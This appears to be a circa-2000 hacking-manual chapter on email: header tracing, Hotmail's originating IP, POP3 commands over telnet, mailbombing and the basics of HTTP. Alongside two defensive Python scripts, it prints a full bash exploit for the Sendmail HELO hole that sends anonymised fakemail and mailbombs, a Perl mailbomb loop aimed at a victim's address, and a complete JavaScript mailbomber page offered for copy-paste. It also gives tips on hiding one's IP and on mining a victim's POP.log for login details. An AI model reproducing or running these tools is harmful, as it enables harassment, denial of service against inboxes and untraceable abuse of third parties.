Received: from delhi1.mtnl.net.in (203.xx.243.51) by qg.egroups.com with

SMTP; 13 Apr 2000 08:58:01 -0000

After the mail was composed, delhi1.mtnl.net.in, whose IP is 203.xx.243.51, passed the email on to the egroups server qg.egroups.com. (eGroups evidently ran several inbound mail hosts; qg.egroups.com is simply the one that accepted this message.)

Then qg.egroups.com's own qmail daemon queued the message: that is what the "(qmail 2092 invoked from network)" line records. qmail is another mail daemon, like Sendmail, but written with security as its primary design goal. qg.egroups.com then passed the mail on to mta1, another machine within the eGroups internal network; in that hop qg.egroups.com shows up under its internal address 10.1.2.27, and "(HELO qg.egroups.com)" is the name it announced. (See, the email headers do not always display the machine name; sometimes they only show the IP. And these machines are on a private network behind a firewall, so there is no use telnetting to them.) mta1 cannot be its full name, and its IP is not given in that line either, but look at the next line up: m3.onelist.org received the message from 10.1.10.26, so that is mta1's address. If you have read this manual carefully you can say what kind of network it is: 10.0.0.0/8 is the private address range set aside by RFC 1918, the classic Class A block.

mta1, or 10.1.10.26, then sent it to m3.onelist.org using QMQP. Now what the hell is that? QMQP, the Quick Mail Queueing Protocol, is a qmail-specific protocol for handing a complete message straight into another qmail host's queue in one operation. It is used between machines of one installation and is normally restricted to preauthorised hosts, since it does no checking of its own.

Received:from [10.1.10.37] by b05.egroups.com with NNFMP; 13 Apr 2000

08:58:09 -0000

Received: (qmail 20883 invoked from network); 13 Apr 2000 08:58:07 -0000

The "(qmail 20883 invoked from network)" line is m3.onelist.org's qmail queueing the message in turn; it was then handed to b05.egroups.com by 10.1.10.37, which is presumably m3.onelist.org's internal address (or another machine in the same cluster). NNFMP is an eGroups-internal transport, not a public standard, so the header tells us only that b05.egroups.com received the message over it. What we can tell is that b05.egroups.com is the machine where the list is expanded: it holds the database of subscribers of the mailing list, and it is from here that a copy goes out to every member.

Return-Path: <sentto-1575622-4-ankit=bol.net.in@returns.onelist.com>

Received: from b05.egroups.com by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000021910; Thu, 13

Apr 2000 14:29:14 +0530 (IST)

X-eGroups-Return: sentto-1575622-4-ankit=bol.net.in@returns.onelist.com

As the server works through the subscribers in its database, it prepares a separate set of headers for each of them and sends them their copy. The numbers in the Return-Path address are the reference numbers the eGroups server uses for this particular member and message, and the recipient's own address (ankit=bol.net.in) is embedded in it. Hence the Return-Path does not show the sender of the email but identifies the subscriber this copy was meant for. This technique is known as VERP (variable envelope return path): if the copy bounces, the bounce goes to that unique address and the list software knows exactly which subscription failed, which is how lists drop dead addresses automatically after a few bounces.

There is a misconception that if an email has been sent from a Hotmail account you remain anonymous. This is not at all true. Hotmail may seem anonymous to a certain extent, but it is not too difficult to find out more about a Hotmail user.

The reason lies in the headers that the Hotmail mail servers attach to all outgoing mail. Hotmail records the IP address from which a user logs in to his account and stamps it on every message he sends. Let's take a look at a typical header of an email sent from a Hotmail account.

Return-Path: <namita_8@hotmail.com>

Received: from hotmail.com by delhi1.mtnl.net.in

(8.9.1/1.1.20.3/26Oct99-0620AM)

id TAA0000032714; Sun, 23 Jan 2000 19:02:21 +0530 (IST)

Received: (qmail 34532 invoked by uid 0); 23 Jan 2000 13:30:14 -0000

Message-ID: <20000123133014.34531.qmail@hotmail.com>

Received: from 202.54.109.174 by www.hotmail.com with HTTP; Sun, 23 Jan 2000

05:30:14 PST

X-Originating-IP: [202.xx.109.174]

From: "Namita Mullick" <namita_8@hotmail.com>

To: ankit@bol.net.in

Date: Sun, 23 Jan 2000 19:00:14 IST

Mime-Version: 1.0

Content-Type: text/plain; format=flowed

X-UIDL: 5c296dd2b5265c76e117ae1390e229ab

The line that interests us the following:

X-Originating-IP: [202.xx.109.174]

NOTE: I have delibrately inserted xx instead of actual numbers for privacy purposes.

What's this in the brackets? It is the IP address of the machine the sender was using when she logged in to Hotmail. This IP would most certainly be a dynamic one, which means that somebody else might be assigned the same IP at this moment. But we can easily find out which ISP hands out this IP to its subscribers: a whois lookup on the address tells you who the block is allocated to, and a traceroute shows the hostnames on the path, which usually name the ISP:

C:\windows>tracert 202.xx.109.174
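Here is a small script, added as an illustration and not part of the original manual, that does mechanically what the last three sections did by hand: it walks the Received chain of a message bottom-up, flags the two tells of the forged Bill Gates mail (a first hop recorded by HELO name only, and a Message-Id generated somewhere other than the From domain), and pulls out the originating address of the Hotmail mail. The three header blocks inside it are the ones quoted above, trimmed to the lines needed and with the IPs redacted as in the text; the field names and helper functions are my own.

```python
# Added example (not from the manual): parse a message's Received: chain and
# apply the checks the text describes. The three header blocks below are the
# ones quoted in the text, trimmed to the lines needed; IPs stay redacted as 'xx'.
import email
import re
from dataclasses import dataclass
from typing import List, Optional

FORGED = """\
Received: from microsoft.com by myisp.com (8.9.1/1.1.20.3/26Oct99-0620AM)
    id UAA0000020667; Fri, 7 Apr 2000 20:00:10 +0530 (IST)
From: <billgates@microsoft.com>
Message-Id: <200004071430.UAA0000020667@delhi1.mtnl.net.in>
"""
LISTMAIL = """\
Received: from b05.egroups.com by delhi1.mtnl.net.in
    (8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000021910; Thu, 13 Apr 2000 14:29:14 +0530 (IST)
Received: from [10.1.10.37] by b05.egroups.com with NNFMP; 13 Apr 2000 08:58:09 -0000
Received: (qmail 20883 invoked from network); 13 Apr 2000 08:58:07 -0000
Received: from unknown (10.1.10.26) by m3.onelist.org with QMQP; 13 Apr 2000 08:58:07 -0000
Received: from unknown (HELO qg.egroups.com) (10.1.2.27) by mta1 with SMTP; 13 Apr 2000 08:58:07 -0000
Received: (qmail 2092 invoked from network); 13 Apr 2000 08:58:01 -0000
Received: from delhi1.mtnl.net.in (203.xx.243.51) by qg.egroups.com with SMTP; 13 Apr 2000 08:58:01 -0000
Received: from bol.net.in by delhi1.mtnl.net.in
    (8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000001463; Thu, 13 Apr 2000 14:28:46 +0530 (IST)
Message-ID: <38F61F28.B2045192@bol.net.in>
From: Ankit Fadia <ankit@bol.net.in>
"""
HOTMAIL = """\
Received: from hotmail.com by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM)
    id TAA0000032714; Sun, 23 Jan 2000 19:02:21 +0530 (IST)
Received: (qmail 34532 invoked by uid 0); 23 Jan 2000 13:30:14 -0000
Message-ID: <20000123133014.34531.qmail@hotmail.com>
Received: from 202.xx.109.174 by www.hotmail.com with HTTP; Sun, 23 Jan 2000 05:30:14 PST
X-Originating-IP: [202.xx.109.174]
From: "Namita Mullick" <namita_8@hotmail.com>
"""

# A dotted quad (or the text's 'xx' redaction) that is not part of a version
# string such as the 8.9.1/1.1.20.3 in Sendmail's Received line.
IP_RE = re.compile(r"(?<![\w./-])(?:\d{1,3}|xx)(?:\.(?:\d{1,3}|xx)){3}(?![\w./-])")

@dataclass
class Hop:
    frm: Optional[str]    # name the sending side announced (HELO) or gave in 'from'
    ip: Optional[str]     # connecting address, if the receiving MTA recorded one
    by: Optional[str]     # MTA that wrote this Received: line
    proto: Optional[str]  # SMTP, QMQP, NNFMP, HTTP ...
    date: str

def parse_received(value: str) -> Hop:
    clause, _, date = " ".join(value.split()).rpartition(";")   # unfold, split off the date
    if not clause.startswith("from "):      # qmail's local '(qmail N invoked ...)' notes
        return Hop(None, None, None, None, date.strip())
    helo = re.search(r"\(HELO (\S+)\)", clause)                  # qmail records the HELO separately
    frm = helo.group(1) if helo else clause.split()[1]
    by = re.search(r"\bby (\S+)", clause)
    proto = re.search(r"\bwith (\S+)", clause)
    ip = IP_RE.search(clause)
    return Hop(frm, ip and ip.group(0), by and by.group(1), proto and proto.group(1), date.strip())

def hops(raw: str) -> List[Hop]:
    """Received: lines in travel order: each MTA prepends its own, so the bottom one is first."""
    msg = email.message_from_string(raw)
    return [parse_received(v) for v in reversed(msg.get_all("Received", []))]

def domain_of(header: str) -> str:
    m = re.search(r"@([\w.-]+)", header)
    return m.group(1).lower() if m else ""

def originating_ip(raw: str) -> Optional[str]:
    """Nearest address to the human sender: a webmail X-Originating-IP stamp if
    present, otherwise the earliest hop whose receiving MTA recorded a connecting IP."""
    stamp = IP_RE.search(email.message_from_string(raw).get("X-Originating-IP", ""))
    return stamp.group(0) if stamp else next((h.ip for h in hops(raw) if h.ip), None)

def spoof_indicators(raw: str) -> List[str]:
    """The two tells discussed in the text; each is a reason to look harder, not proof."""
    msg, flags = email.message_from_string(raw), []
    first = next((h for h in hops(raw) if h.by), None)
    if first and first.ip is None:
        flags.append(f"{first.by} recorded only the HELO name {first.frm!r}, no connecting "
                     "IP, so the first hop cannot be verified")
    from_dom, mid_dom = domain_of(msg.get("From", "")), domain_of(msg.get("Message-Id", ""))
    if from_dom and mid_dom and not mid_dom.endswith(from_dom):
        flags.append(f"Message-Id was generated at {mid_dom}, which is not under the From domain {from_dom}")
    return flags

if __name__ == "__main__":
    for h in hops(LISTMAIL):
        print(f"{h.frm or '(queued locally)':>20} -> {h.by or '-':<20} ip={h.ip} via {h.proto}")
    print("forged:", spoof_indicators(FORGED))
    print("hotmail sender:", originating_ip(HOTMAIL))
```

Run it and the list message prints as eight hops from bol.net.in to delhi1.mtnl.net.in in travel order. Both checks in spoof_indicators are reasons to look harder, not proof: an ISP that records no connecting IP flags every genuine mail it relays as well (the list message trips that check too), which is exactly why a Received line without a bracketed address is such a weak place to start an investigation.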

This is not an oversight on Hotmail's part: most web based email services, and some ISPs, deliberately stamp the originating IP on outgoing mail so that abuse can be traced. So how do you get around it? Proxy servers hold the answer. Let's understand how proxy servers give anonymity. Normally a TCP/IP data transfer takes place in the following way:

Your IP Address is 203.xx.21.11 and you connect to www.hotmail.com.

203.xx.21.11 ----------> www.hotmail.com

You send a request to hotmail.com. Hotmail's server records your IP and uses this recorded IP to send data packets back to you.

www.hotmail.com --------> 203.xx.21.11

So when you send an email using your Hotmail account, the receiver of your email learns the IP you were using and can trace you. But if you route your connection through a proxy server, the data transfer takes place in the following way:

203.xx.21.11 --------> 121.xx.01.89 ----------> www.hotmail.com

Now you send your request to hotmail.com via the proxy server, whose IP address is 121.xx.01.89. Hotmail has a direct connection only with the proxy server (121.xx.01.89) and only an indirect one with you (203.xx.21.11). Hence the IP that Hotmail records is the proxy's and not yours, and you remain private. Two caveats: the proxy must run on some other host, because a proxy installed on your own machine still connects out from your own address; and many proxies tell the web server the real client address in an X-Forwarded-For header, in which case nothing is hidden at all. The proxy operator, of course, sees everything you send.

Popular proxy servers for Windows are WinGate and WinProxy. There are also online privacy services like anonymous.com and privacyx.com; of these, only privacyx.com is a good one.

*********ROOTSHELL***************

Here's a brief description of a Sendmail (qmail) hole I found recently:

When someone mailbombs you, or tries to send fakemail, spam, etc., sendmail normally attaches the sender's host name and its address to the outgoing message:

--

>From spam@flooders.net Mon Jan 5 22:08:21 1998

Received: from spammer (marc@math.university.edu [150.129.84.5])

by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376

for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100

Date: Mon, 5 Jan 1998 22:07:54 +0100

From: spam@flooders.net

Message-Id: <3.14159665@pi>

MAILBOOM!!!

--

That's perfect - now you know who is responsible for that annoying junk in your mailbox: "Received: from spammer (marc@math.university.edu [150.129.84.5])". Nothing easier... But I found a small hole, which allows a user to hide his identity and send mails anonymously. The only thing you should do is to pass a HELO string longer than approx. 1024 B - the sender's location and other very useful information will be cropped!!! Message headers should become uninteresting. Sometimes the sender may become quite untraceable (but not always, if it's possible to obtain logs from the machine which has been used to send):

--

>From spam@flooders.net Mon Jan 5 22:09:05 1998

Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx

Date: Mon, 5 Jan 1998 22:08:52 +0100

From: spam@flooders.net

Message-Id: <3.14159665@pi>

MAILBOOM!!! Now guess who am I...

--

 

Here's a simple example of Sendmail's HELO hole usage. Note, this script has been written ONLY to show how easy sending fakemails and mailbombs may be with the cooperation of Sendmail ;) The script is very slow and restricted in many ways, but explains the problem well (note, some non-Berkeley daemons are also affected, probably Qmail?):

-- EXPLOIT CODE --

#!/bin/bash

TMPDIR=/tmp/`whoami`

PLIK=$TMPDIR/.safe

TIMEOUT=2

LIMIT=10

MAX=20

echo

echo "SafeBomb 1.02b -- sendmail HELO hole usage example"

echo "Author: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>"

echo

if [ "$4" = "" ]; then

echo "USAGE: $0 msgfile address server sender"

echo

echo " msgfile - file to send as a message body"

echo " address - address of lucky recipient"

echo " server - outgoing smtp server w/sendmail"

echo " sender - introduce yourself"

echo

echo "WARNING: For educational use ONLY. Mailbombing is illegal."

echo "Think twice BEFORE you use this program in any way. Also,"

echo "I've never said this program is 100% safe nor bug-free."

echo

sleep 1

exit 0

fi

if [ ! -f $1 ]; then

echo "Message file not found."

echo

exit 0

fi

echo -n "Preparing message..."

mkdir $TMPDIR &>/dev/null

chmod 700 $TMPDIR

echo "echo \"helo

_safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_

_safebomb__safebomb__safebomb__sa

febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa

febomb__safebomb__safebomb__safebomb__safebomb__saf

ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf

ebomb__safebomb__safebomb__safebomb__safebomb__safe

bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe

bomb__safebomb__safebomb__safebomb__safebomb__safeb

omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb

omb__safebomb__safebomb__safebomb__safebomb__safebo

mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo

mb__safebomb__safebomb__safebomb__safebomb__safebom

b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom

b__safebomb__safebomb__safebomb__safebomb__safebomb

b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom

b__safebomb__safebomb__safebomb__safebomb__safebomb

__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb

__safebomb__safebomb__safebomb__safebomb__safebomb_

_safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_\""

>$PLIK

echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK

echo "echo \"rcpt to: $2\"" >>$PLIK

echo "echo \"data\"" >>$PLIK

echo "cat <<__qniec__" >>$PLIK

cat $1 >>$PLIK

echo "__qniec__" >>$PLIK

echo "echo \".\"" >>$PLIK

echo "echo \"quit\"" >>$PLIK

echo "sleep $TIMEOUT" >>$PLIK

chmod +x $PLIK

echo "OK"

echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."

SENT=0

while [ -f $1 ]; do

$PLIK|telnet $3 25 &>/dev/null &

let SENT=SENT+1

echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"

CONNECTED=`ps|grep -c "telnet $3"`

if [ "$LIMIT" -le "$CONNECTED" ]; then

while [ "$LIMIT" -le "$CONNECTED" ]; do

sleep 1

done

fi

if [ "$SENT" -ge "$MAX" ]; then

echo "It's just an example, sorry."

echo

exit 0

fi

done

-- EOF --

Suggested fix: insert an additional length limit into the HELO/EHLO parameter scanning routine OR disable AllowBogusHELO (but it may cause serious trouble). I have no 8.8.8 sources at the moment, so excuse me if it's unclear.

PS:

--

From: Gregory Neil Shapiro <sendmail+gshapiro@sendmail.org>

I was able to reproduce the header problem by lengthening the HELO string in your script.

[...]

This will be fixed in sendmail 8.9.

--

******ROOTSHELL***********

Receiving mail without an Email client POP3 (Port 110)

Now that you know practically everything one could want to know about sending emails, let's move on to receiving emails the kewl way. Normally you launch your favourite email client and click on the receive button to start downloading new messages. The email client connects to your mail server and starts issuing POP commands. That is how the normal procedure of downloading emails takes place.

*************

Hacking Truth: Just like the SMTP log, Outlook Express maintains a log file containing the POP commands it issued to download emails from the mail server. This is the POP.log file, again stored in the "c:\windows\Application Data" folder; just search for it. One can go through it to find out the victim's username, mail server and the length of the password.

*************

So what exactly is POP? POP, or Post Office Protocol, is nothing but a protocol used to download messages from a mail server. A mail server implementing POP stores the emails for its users and serves email clients, which download the messages by issuing POP commands. The server holds the messages until the user logs in to retrieve them; once a client has downloaded them it normally tells the server to delete them, though a client can be configured to leave them on the server.

POP3 is the third and current version of the Post Office Protocol (RFC 1939).

The POP daemon runs by default on port 110. It is not as cooperative as Sendmail and provides no help. Unlike the Sendmail daemon it requires the user to enter a username and password, so nobody can download emails without first authenticating. Note that with plain POP3 both the username and the password travel over the network in the clear, which is exactly why the POP.log file above, and a sniffer anywhere on the path, are so informative. So let's learn POP3.

Launch Telnet and telnet to Port 110 of your mail server by issuing the command:

telnet mail2.isp.net 110

You will be welcomed by the daemon banner, which would probably be something like:

+OK QPOP (version 2.53) at delhi1.mtnl.net.in starting.

This means the daemon is ready for your input. Now let's see what happens if you type Help at the prompt. Most servers will disconnect you as soon as they encounter a wrong move from the client. My ISP does not disconnect me, but I do not get any response at all; the Telnet client just hangs. The '?' command does not bring any response either. The POP daemon is really cranky and does not stand any 'roobish' (read rubbish) at all. So unfortunately all those of you who are as forgetful as I am will have to somehow remember the POP commands.

Before you can issue any other command you have to provide the POP daemon with a username and password: the USER command supplies the username and the PASS command the password. Let's say my username is ankit and the password is hackingtruths; then I would log in in the following way:

USER ankit

The server replies:

+OK Password required for ankit.

Now we need to give the POP daemon what it needs a password:

PASS hackingtruths

The server replies:

+OK ankit has xx messages (yyyyy octets).

where xx is the number of messages waiting in the mailbox (all of them, not only unread ones) and yyyyy is the space they occupy in octets (bytes).

For example, if I have 22 messages occupying 135981 octets, I get:

+OK ankit has 22 messages (135981 octets).

If either the username or the password is incorrect you will receive an error message, something like:

-ERR Bad login (if the username is invalid)

-ERR Password supplied for "usernamehere" is incorrect. (if the username is correct but the password is wrong)

These two different replies, by the way, tell anyone who tries which usernames exist on the server; a careful server answers both cases with the same message.

Now that you have authenticated, let's list the messages with the 'list' command. For example, I have 2 messages in my Inbox; when I give the list command the server returns the following.

I type the list command:

list

The server returns

+OK 2 messages (8164 octets)

1 2471

2 5693

.

The number on the right of each message number is the size of that email in octets. Note the message numbers (1 and 2 above): they are important because they are used to read or delete a particular email, much as filenames are used for files. They are only valid for the current session; after deletions the remaining messages are renumbered from 1 at the next login. Now to read a particular message, type the 'retr' command followed by the message number. For example, to view message 1 I type:

retr 1

This shows the entire email with full headers. Make sure you log that session before viewing messages this way, as they scroll past at very high speed. If you only want the headers, 'top 1 0' returns the headers of message 1 and zero lines of its body (TOP is listed as optional in RFC 1939, but practically every server supports it).

Similarly the 'dele' command followed by the message number can be used to delete a particular message. For example, the first email can be deleted by giving the command:

dele 1

The server responds:

+OK Message 1 has been deleted.

Despite what the reply says, the message is only marked for deletion at this point; it is actually removed when you end the session with quit. An rset before that unmarks everything, and if the connection drops without a quit nothing is deleted at all.

There is yet another not so well known command, 'stat', which gives the number of messages and their total size.

For example, I type:

stat

The server responds:

+OK 22 135981

indicating that I have 22 messages whose total size is 135981 octets.

Once you are done with everything, type the 'quit' command to end the session.

The server responds:

+OK Pop server at delhi1.mtnl.net.in signing off.

MailBombing

Mailbombing means sending a huge number of emails (hundreds, thousands or even millions) to a single email account so that the account's space is filled up, the owner cannot receive any other important emails, and it becomes difficult to read the existing ones among the gigantic number of new ones.

All email accounts have a maximum space limit; for example Yahoo has a limit of 3 MB. Once this space is filled up, no new messages can come in and the mail server bounces any new messages that arrive (some services allow users to exceed the assigned limit). So if the victim who has been mail bombed is expecting any important messages, he can pretty much kiss them goodbye. Not only that, his Inbox is filled with so many useless messages that he cannot even read the existing ones, and deleting the junk takes up a lot of valuable time.

Mailbombing is a very irritating and lame thing to do. It is the lamest thing a hacker could possibly do, but I am just putting forward all the info that I can. Do not mail bomb someone; I certainly do not recommend it.

There are 2 types of mailbombing-:

1. Mass Mail Bombing

2. List Linking

The Mass Mail Bombing Method

In this kind of mail bombing the victim's Inbox is flooded with a huge number of copies of the same email. There are mail bombing programs which let you send a particular message as many times as you want via an SMTP server; some also allow you to send a message perpetually. A mail bombing program can easily be written in Perl. The following is a script that I picked up somewhere on the net (it runs only on Unix platforms, since it pipes into the local sendmail binary):

#!/bin/perl

$mprogram= '/usr/lib/sendmail';

$victim= 'victim@hostname.com';

$var=0;

while($var < 1000) {

open(MAIL, "|$mprogram $victim") || die "Can't open Mail Program\n";

print MAIL "Mail Bomb";

close(MAIL);

sleep(4);

$var++;

}

This Perl script sends 1000 mails to the victim, one every four seconds. It can easily be modified to send 100000 messages instead of only 1000.

This kind of mail bombing has one shortcoming: say you sent the victim 1000 messages; once the victim has deleted them, that's it, that's the end of the whole idea. This is where list linking comes in, as it is more effective in harassing the victim.

List Linking

In this kind of mail bombing the victim is subscribed to thousands of mailing lists whose subjects range from Beetle lovers to people interested in seeing earthworms eat things.This kind of mail boming is more effective as the victim has to find out ways of unsubscribing himself from this long list of boring mailing lists. Believe me, many people have problems unsubscribing from mailing lists.

The most common method used by people to mail bomb someone, is to use Mail Bombing Software. Mail Bombing software asks for the victim's email address, the address of a SMTP server, the forged email address from which you want the Mail bombs to appear to have come and the number of emails that have to be sent and of course the body of the mail bomb. Mail Bombing is as easy as a few clicks and it is really common amon gst lamers with a huge ego.

Now let's see what you do when you are mail bombed. You open your Inbox and find that you have 20000 new messages with the same subject "You suck!!!". So you are sure that that lamer who hates you so much has proved his lameness (is that a word?) by mail bombing you. No, you do not start downloading all the 20000 messages and then delete them; instead you log on to the POP port of your mail server and delete the useless mails by issuing POP commands. If you are able to read the headers well enough then you can easily trace the mail bomber and kick him off his ISP by complaining to tech support.
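The POP-side cleanup just described, as an added example that is not part of the original manual: the client pulls only the headers of each message with TOP and issues DELE for those whose Subject matches the bomb, so none of the 20000 bodies is downloaded. FakePOP3 is a constructed in-memory stand-in with the same list/top/dele/quit methods as poplib.POP3 from the standard library, so the code runs offline; against a real mailbox you would substitute poplib.POP3(host) after user()/pass_().

```python
from email import policy
from email.parser import BytesParser

# Constructed in-memory stand-in for a POP3 server. It mimics the subset of
# poplib.POP3 that the cleanup needs (list, top, dele, quit) so the logic can
# be exercised offline; swap it for poplib.POP3(host) against a real mailbox.
class FakePOP3:
    def __init__(self, messages):
        self.messages = list(messages)      # raw RFC 822 bytes; POP3 numbers them from 1
        self.deleted = set()

    def list(self):
        # poplib returns (b'+OK ...', [b'1 size', ...], octets)
        entries = [f"{i} {len(m)}".encode() for i, m in enumerate(self.messages, 1)
                   if i not in self.deleted]
        return (b"+OK", entries, 0)

    def top(self, which, howmuch):
        # TOP n 0 returns headers only: (b'+OK', [lines...], octets)
        raw = self.messages[which - 1]
        headers = raw.split(b"\r\n\r\n", 1)[0]
        return (b"+OK", headers.split(b"\r\n"), len(headers))

    def dele(self, which):
        self.deleted.add(which)
        return b"+OK"

    def quit(self):
        return b"+OK"


def message_numbers(pop):
    """Message numbers currently in the mailbox, taken from the LIST response."""
    _, entries, _ = pop.list()
    return [int(e.split()[0]) for e in entries]


def subject_of(pop, num):
    """Fetch only the headers of message `num` (TOP num 0) and return its Subject."""
    _, lines, _ = pop.top(num, 0)
    msg = BytesParser(policy=policy.default).parsebytes(b"\r\n".join(lines))
    return msg.get("Subject", "")


def delete_by_subject(pop, bomb_subject):
    """Mark every message whose Subject equals bomb_subject for deletion.

    Returns the list of message numbers deleted. Nothing beyond headers is
    transferred, which is the point when the mailbox holds thousands of copies.
    """
    victims = []
    for num in message_numbers(pop):
        if subject_of(pop, num).strip() == bomb_subject:
            pop.dele(num)
            victims.append(num)
    pop.quit()          # POP3 commits deletions only when the session ends with QUIT
    return victims


def build_mailbox():
    """Constructed sample mailbox: two legitimate mails among 200 bomb copies."""
    bomb = b"From: joe@example.invalid\r\nSubject: You suck!!!\r\n\r\nYou suck!!!\r\n"
    good1 = b"From: mum@example.invalid\r\nSubject: Dinner on Sunday\r\n\r\nCome at 7.\r\n"
    good2 = b"From: boss@example.invalid\r\nSubject: Re: report\r\n\r\nThanks.\r\n"
    return [bomb] * 100 + [good1] + [bomb] * 100 + [good2]


if __name__ == "__main__":
    pop = FakePOP3(build_mailbox())
    gone = delete_by_subject(pop, "You suck!!!")
    print(f"deleted {len(gone)} messages, {len(message_numbers(pop))} left")
```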

Mail Bombers are very simple to design. Knowledge of C or Perl makes things really easy. I designed a simple Mail Bomber in JavaScript. Although not too efficient, it gives you an idea of how easy it is to make a Mail Bomber. It also allows you to specify the number of bombs. The only shortcoming is that the victim will easily know who sent the mail bombs, as this JavaScript Bomber does not forge email; instead it uses the user's normal real email address to bomb the victim. To understand the code you need to know HTML and JavaScript. Simply copy and paste the following code into Notepad and save it as a .htm or .html file.

############CUT HERE###########

<HTML>

<HEAD>

<TITLE>Ankit's MailBomber</TITLE>

<script language="JavaScript">

<!--

function checkAGE(){if (confirm

("This Mail Bomber Belongs to Ankit Fadia----ankit@bol.net.in"));return " "}

document.writeln(checkAGE())---->

</Script>

</HEAD>

<BODY ulink="white" vlink="white" alink="white" BGCOLOR="#000000"

TEXT="#FFFFFF" ONLOAD="ResetForm()" BODY>

<P><SCRIPT LANGUAGE="JavaScript"><!-- JavaScript MailBomber

var mail123 = 10000

function MailBombing(iInterval)

{

document.Bomber.submit();

if (document.SetupMailData.NumberOfBombs.value-- > 0)

{

window.setTimeout('MailBombing()',mail123);

}

else

alert("MailBombing...");

}

function VerifyNumber(iNumber)

{ var i;

var ch = "";

for (i=0;i<iNumber.length;i++)

{

ch = iNumber.substring(i,i+1)

if (ch < "0" || ch > "9")

return false;

}

return true;

}

function MailBomb()

{

var szMsg;

if (document.SetupMailData.UserToBomb.value == "")

{

alert("Please enter a valid email address to mailbomb.");

document.SetupMailData.UserToBomb.focus;

return;

}

if (VerifyNumber(document.SetupMailData.NumberOfBombs.value)==false)

{

alert("Invalid Number of Bombs");

document.SetupMailData.NumberOfBombs.focus;

return;

}

if (document.SetupMailData.Subject.value == "")

{

alert("Please Enter a subject for:"

+document.SetupMailData.UserToBomb.value);

document.SetupMailData.Subject.focus;

return;

}

if (document.Bomber.text.value == "")

{

alert("Please Enter Message");

document.Bomber.text.focus; // set user focus to here

return;

}

szMsg = "Mail Bombing: " + document.SetupMailData.UserToBomb.value +

"\n";

szMsg += "Please Wait while MailBombeing is completed."

szMsg += "You will Be Notified when the "

szMsg += "MailBombing Completes."

alert(szMsg);

document.Bomber.action = "mailto:" +

document.SetupMailData.UserToBomb.value + "?subject=" +

document.SetupMailData.Subject.value;

MailBombing(mail123);

}

function ResetForm()

{

document.SetupMailData.UserToBomb.value = "";

document.SetupMailData.Subject.value = "Enter Subject Here";

document.SetupMailData.NumberOfBombs.value = 1000000;

document.Bomber.text.value = "Enter Message Here";

}

// End of hiding our code --></SCRIPT></P>

 

<CENTER><P>

</font>

</b>

</b>

<CENTER><P><FORM NAME="SetupMailData">Victim's Email Address:<BR>

<INPUT TYPE=text NAME="UserToBomb" SIZE=62></P></CENTER>

<CENTER><P>Number of Email Bombs:<BR>

<INPUT TYPE=text NAME="NumberOfBombs" VALUE=10000 SIZE=10></P></CENTER>

<CENTER><P>Subject:<BR>

<INPUT TYPE=text NAME="Subject" SIZE=62></FORM></P></CENTER>

<CENTER><P><FORM METHOD=POST NAME="Bomber" ENCTYPE="text/plain">Message:<BR>

<TEXTAREA ROWS=10 COLS=60 NAME="text"></TEXTAREA></P></CENTER>

<CENTER><P><INPUT name="btnBombUser" TYPE=button onClick="MailBomb()"

value="Mail Bomb User"><BR>

<BR>

<BR>

</FORM><BR>

Coded By: Ankit Fadia----ankit@bol.net.in <br>

<a href="http://hackingtruths.webprovider.com">

http://hackingtruths.webprovider.com</a>

For more tutorials send an email to: programmingforhackers-subscribe@egroups.com

<BR>

</BODY>

</HTML>

##########CODE ENDS HERE########

HTTP Torn Apart (Port 80)

What exactly happens when you type a URL (Uniform Resource Locator) in the location bar of the browser? Well, firstly the browser performs a DNS query and converts the human readable domain name (like hotmail.com) into a machine readable IP address. Once the browser gets the IP address of the host, it connects to Port 80 (the HTTP daemon by default runs on Port 80) of the remote host and asks the host for a particular document or page with the help of HTTP commands. HTTP or HyperText Transfer Protocol is the protocol used by browsers to communicate with hosts, i.e. to ask for a particular file at a specific URL or to send or post data to the server. We are never aware of this process, which occurs in the background.

Now in this section we will learn to do manually what the browser does automatically. When the browser asks for a file at a specific URL it is said to 'request' information. Now before we move on, let's see what a typical request looks like. A typical HTTP request would be something like the below:

get url HTTP/1.1

Let's see what the specific parts of a typical request stand for. The first word, i.e. the 'get' part, is called the method. There are 3 types of methods:

The Get method

The 'get' method is the most common method and is widely used. It is with the 'get' method that browsers request pages or documents. In this kind of method you are the client (browser) and request a page from the server, which is the host you are connected to.

The Post Method

The 'post' method is used to upload files to the server. This kind of method is used, say, when you upload your website not by using the FTP service but by straightaway uploading files through an HTML page. In this method there is a reversal of roles and now you become the server and the host you are connected to becomes the client.

The Head Method

The 'head' method is the least popular method and not many people know about it. Although not widely used, it is still a part of the HTTP methods. You would use the 'head' method, say, when you want to make sure that a particular file exists at a particular URL without downloading the entire file. This method just downloads the header info of a particular file and not the entire file.

All this might seem a bit weird, but I suggest that you just understand the basic difference between the various methods and then move on.

Anyway, coming back to the various parts of an HTTP request. The first part, as you now know, is the method; the second part is the URL that you are requesting. Say for example I want to request the contacts.htm file, then the HTTP request would look something like:

get /contacts.htm HTTP/1.1

Now you may ask where the first '/' has come from. To understand that you need to look at the URL that you type into the Location bar of the browser. Say for example the HTML file that you are requesting is http://www.microsoft.com/windows.htm; then the URL would be what is left after removing the http:// and the domain name, i.e. www.microsoft.com. Hence the URL is /windows.htm

